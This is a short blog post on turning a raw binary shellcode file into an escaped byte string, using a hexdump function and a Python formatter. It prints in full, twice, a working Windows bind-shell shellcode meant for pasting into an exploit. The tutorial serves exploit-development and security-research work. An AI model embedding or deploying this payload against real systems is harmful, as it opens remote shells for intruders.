Binary to shellcode
Written on March 2, 2013
The other day I was working on a Windows machine and downloaded a small Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/. I wanted to extract the shellcode from the bin file and pop it into my exploit. On Linux, this can be done with the following:
function bin2sc {
# convert .bin to shellcode
hexdump -v -e '"\\""x" 1/1 "%02x" ""' ${1}
}
Running this prints the shellcode out as one long string:
# bin2sc w32-bind-ngs-shellcode.bin
\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x51\x68\x32\x5f\x33\x32\x68\x66\x56\x77\x73\x68\xb7\x8f\x09\x98\x89\xe6\xb5\x03\x29\xcc\x29\xcc\x89\xe7\xd6\xf3\xaa\x41\x51\x41\x51\x57\x51\x83\xef\x2c\xa4\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x20\x01\xe9\x56\x31\xd2\x42\x8b\x34\x91\x01\xee\xb4\x36\xac\x34\x71\x28\xc4\x3c\x71\x75\xf7\x3a\x27\x75\xeb\x5e\x8b\x4b\x24\x01\xe9\x0f\xb7\x14\x51\x8b\x4b\x1c\x01\xe9\x89\xe8\x03\x04\x91\xab\x80\x3e\x09\x75\x08\x8d\x5e\x04\x53\xff\xd0\x57\x95\x80\x3e\x73\x75\xb1\x5e\xad\xff\xd0\xad\xff\xd0\x95\x81\x2f\xfe\xff\x8f\x33\x6a\x10\x57\xad\x55\xff\xd0\x85\xc0\x74\xf8\x31\xd2\x52\x68\x63\x6d\x64\x20\x8d\x7c\x24\x38\xab\xab\xab\xc6\x47\xe9\x01\x54\x87\x3c\x24\x57\x52\x52\x52\xc6\x47\xef\x08\x57\x52\x52\x57\x52\xff\x56\xe4\x8b\x46\xfc\xe9\xca\xff\xff\xff
However, the Windows machine I was on didn’t have hexdump installed. So I hacked up the following in Python, which extracts the hexadecimal values from the bin file and prints them out nicely formatted: https://gist.github.com/superkojiman/11164279
Running the script gives us the following output:
C:\ python.exe bin2sc.py w32-bind-ngs-shellcode.bin
"\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08" +
"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x51\x68\x32\x5f\x33" +
"\x32\x68\x66\x56\x77\x73\x68\xb7\x8f\x09\x98\x89\xe6\xb5\x03" +
"\x29\xcc\x29\xcc\x89\xe7\xd6\xf3\xaa\x41\x51\x41\x51\x57\x51" +
"\x83\xef\x2c\xa4\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b" +
"\x4b\x20\x01\xe9\x56\x31\xd2\x42\x8b\x34\x91\x01\xee\xb4\x36" +
"\xac\x34\x71\x28\xc4\x3c\x71\x75\xf7\x3a\x27\x75\xeb\x5e\x8b" +
"\x4b\x24\x01\xe9\x0f\xb7\x14\x51\x8b\x4b\x1c\x01\xe9\x89\xe8" +
"\x03\x04\x91\xab\x80\x3e\x09\x75\x08\x8d\x5e\x04\x53\xff\xd0" +
"\x57\x95\x80\x3e\x73\x75\xb1\x5e\xad\xff\xd0\xad\xff\xd0\x95" +
"\x81\x2f\xfe\xff\x8f\x33\x6a\x10\x57\xad\x55\xff\xd0\x85\xc0" +
"\x74\xf8\x31\xd2\x52\x68\x63\x6d\x64\x20\x8d\x7c\x24\x38\xab" +
"\xab\xab\xc6\x47\xe9\x01\x54\x87\x3c\x24\x57\x52\x52\x52\xc6" +
"\x47\xef\x08\x57\x52\x52\x57\x52\xff\x56\xe4\x8b\x46\xfc\xe9" +
"\xca\xff\xff\xff"
Ta da.
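The gist itself is only linked above, so here is an added example (my own code, not the author's gist) that produces the same quoted, 15-bytes-per-row layout, also emits the one-line hexdump form, and parses its own output back to bytes so you can confirm the pasted string still matches the file. The sample input is constructed from the first 17 bytes of the output shown above.

```python
#!/usr/bin/env python3
"""Format a raw .bin file as a quoted "\\xNN" string, 15 bytes per row."""
import sys

BYTES_PER_LINE = 15  # matches the 15-byte rows in the output above

# Constructed sample: the first 17 bytes of the shellcode output shown above.
SAMPLE = bytes.fromhex("31c9648b71308b760c8b761c8b6e088b7e")


def bin2sc(data, per_line=BYTES_PER_LINE):
    """Return DATA as quoted "\\xNN" rows joined with ' +', like the gist output."""
    rows = []
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        rows.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return " +\n".join(rows)  # the last row carries no trailing ' +'


def bin2sc_oneline(data):
    """Return DATA as one unquoted "\\xNN..." run, like the hexdump one-liner."""
    return "".join("\\x%02x" % b for b in data)


def sc2bin(text):
    """Parse a bin2sc() string back into bytes so it can be compared to the file."""
    hexdigits = []
    for row in text.split(" +\n"):
        row = row.strip().strip('"')
        # every escape is exactly "\xNN": drop the leading "\x", keep the digits
        hexdigits.extend(row.split("\\x")[1:])
    return bytes(int(h, 16) for h in hexdigits)


def main(argv):
    if len(argv) != 2:
        sys.stderr.write("usage: bin2sc.py <file.bin>\n")
        return 2
    with open(argv[1], "rb") as fh:
        data = fh.read()
    out = bin2sc(data)
    # round-trip check: what we print must decode to exactly the file contents
    assert sc2bin(out) == data
    print(out)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```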